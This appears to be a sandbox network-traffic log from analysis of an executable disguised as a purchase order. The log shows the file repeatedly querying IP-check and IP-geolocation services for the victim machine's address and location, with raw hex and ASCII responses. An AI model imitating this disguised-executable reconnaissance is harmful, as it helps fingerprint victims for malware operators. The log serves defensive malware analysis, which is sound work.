                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.949724132.226.247.73807704C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 1, 2024 07:21:09.769123077 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Oct 1, 2024 07:21:10.432738066 CEST320INHTTP/1.1 200 OK
                                                            Date: Tue, 01 Oct 2024 05:21:10 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: d09511d9f2c0f973567275f18b69f2f3
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.949726132.226.247.73807704C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 1, 2024 07:21:11.058722973 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Oct 1, 2024 07:21:11.731317043 CEST320INHTTP/1.1 200 OK
                                                            Date: Tue, 01 Oct 2024 05:21:11 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: d87ad9a9caa64d27453aa6694b112526
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.949710188.114.96.34437704C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-01 05:21:01 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-10-01 05:21:01 UTC680INHTTP/1.1 200 OK
                                                            Date: Tue, 01 Oct 2024 05:21:01 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 76092
                                                            Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dAV9QS%2BM2slJzjMsc0Y1%2FmGtoRLY8cVKvQCFaejPQ%2BIjNJjgYxX8rvq5eNkKpUDBHSorvmGXkccLrbLyqWSn%2Fy3T0GrSUJbMW8xIVrLDY2%2BhPoUXaaiOt8vmywPn6RloCe6PS78A"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8cba01bf2d444297-EWR
                                                            2024-10-01 05:21:01 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-10-01 05:21:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.949711188.114.96.34437704C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-01 05:21:02 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-10-01 05:21:02 UTC678INHTTP/1.1 200 OK
                                                            Date: Tue, 01 Oct 2024 05:21:02 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 76093
                                                            Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aEL44%2BO7yJxB6ueivUSoZZTBE%2FAEtoJyLKncc0Pn5gHPcR2aK7GX5MToIfLpuOh1mc%2B5xKGHYsaVY5r4qojNWV0QVqI9A%2Ffr1zD7dcbE6qJgfxSfJ7nUi5jKLzoUakuMyBcISmbX"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8cba01c47a627d24-EWR
                                                            2024-10-01 05:21:02 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-10-01 05:21:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.949714188.114.96.34437704C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-01 05:21:03 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-10-01 05:21:03 UTC680INHTTP/1.1 200 OK
                                                            Date: Tue, 01 Oct 2024 05:21:03 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 76094
                                                            Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6gad3aTVe6sZwwIvIgJ3qyN7tznT57z3bYEUDZhSWJk5NdoyGuChrUcvTSPGab1FyU8yfwL0SthZ1STrpzq8Tt9EQy2WMwu6UzukWWqS%2FDgS%2BxDoWUmWacfqm%2Fq%2Bpyyn9Hw%2Fglhw"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8cba01ccce8e0fa9-EWR
                                                            2024-10-01 05:21:03 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-10-01 05:21:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.949717188.114.96.34437704C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-01 05:21:05 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-10-01 05:21:05 UTC678INHTTP/1.1 200 OK
                                                            Date: Tue, 01 Oct 2024 05:21:05 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 76096
                                                            Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ye%2BVWzykUfGTdtFBcVylmjNwY9J7aTHZAM%2BGo1JRHDoVDJL8DVcKaczY4obgJRdo8%2Fh8BvfLC5h9jBvVRKr5dMzpna9gDaMMmttrOzqN%2FFtA8nmEzp6og74KVE2aCAqzu7hR2oGL"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8cba01dafc408c21-EWR
                                                            2024-10-01 05:21:05 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-10-01 05:21:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.949719188.114.96.34437704C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-01 05:21:07 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-10-01 05:21:07 UTC682INHTTP/1.1 200 OK
                                                            Date: Tue, 01 Oct 2024 05:21:07 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 76098
                                                            Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GbRoAMnVtchy6N4tpWuR8MZzM4gSiRCoSk5PEWqQzk%2F9KkBItWdcpEIzLFNxoHBd8Hl6%2F%2FefC2bqkn3myKTAfysoU%2FkzszbxxAMNowpx8gSt29dS%2FcuZzGgyjM8zy2jrzD%2BowVE2"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8cba01e369e08c0b-EWR
                                                            2024-10-01 05:21:07 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-10-01 05:21:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.949721188.114.96.34437704C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-01 05:21:08 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-10-01 05:21:08 UTC676INHTTP/1.1 200 OK
                                                            Date: Tue, 01 Oct 2024 05:21:08 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 76099
                                                            Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DPNhJfnb5o5HsTyhImp8OUjKJtRpsEjwdXoR7gheSk1Nt7iJkytl1BaU4WEtb6KJzTIY1G7t1WiwZOSWxVpONOIWQqzIpD7%2BI9o10SiEDRtdYe%2BlT5Nmttoh%2BzyZKSutNihJZ5Ow"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8cba01ebaae97d24-EWR
                                                            2024-10-01 05:21:08 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-10-01 05:21:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.949723188.114.96.34437704C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-01 05:21:09 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-10-01 05:21:09 UTC682INHTTP/1.1 200 OK
                                                            Date: Tue, 01 Oct 2024 05:21:09 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 76100
                                                            Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TW2sdneDNEPdVqn0Fm%2FoUPyiXnx%2FwSqwVUR5nQcsSLF096snmKpXDJVP%2BFwIS13G3VNnMAk%2Bzpp4ej5u1dj9ZswQpsFXpbppWmbikSTsOYGxS%2FRVTUezVrQGk4bf5A67%2F0mtAk54"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8cba01f3ae6c41f9-EWR
                                                            2024-10-01 05:21:09 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-10-01 05:21:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.949725188.114.96.34437704C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-01 05:21:10 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-10-01 05:21:11 UTC722INHTTP/1.1 200 OK
                                                            Date: Tue, 01 Oct 2024 05:21:11 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 76102
                                                            Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q3wnZwJYwjIQwZCfEP%2FglduTrFp%2BXe6k0%2FZHji6xBNl7eiTT9GYk%2F1d5GIXRD%2FHIIfdnO9Jnw6fXTdiAn6u%2F4uvvY%2FJ07zkXasPAxcHPniZZ%2FVepMTL%2BlmGFPS1%2FpNy%2BIn2Ro1J4"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8cba01fbbeb8423b-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-10-01 05:21:11 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-10-01 05:21:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.949727188.114.96.34437704C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-01 05:21:12 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-10-01 05:21:12 UTC678INHTTP/1.1 200 OK
                                                            Date: Tue, 01 Oct 2024 05:21:12 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 76103
                                                            Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N6DbF4Y8sT4u0luxf9SDT%2FeUxwqL5T7RGq4xd%2FM7WSlQbOTTJzdFf4x28S3KXjmfXsYRQJRcR1NaHNtGpLWRCIu4PfyxO8%2Fb4OjQvaaD0GHPsZ0Uvxrgx%2BlwewVte3FXo0wuHBwc"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8cba0203cc038cdd-EWR
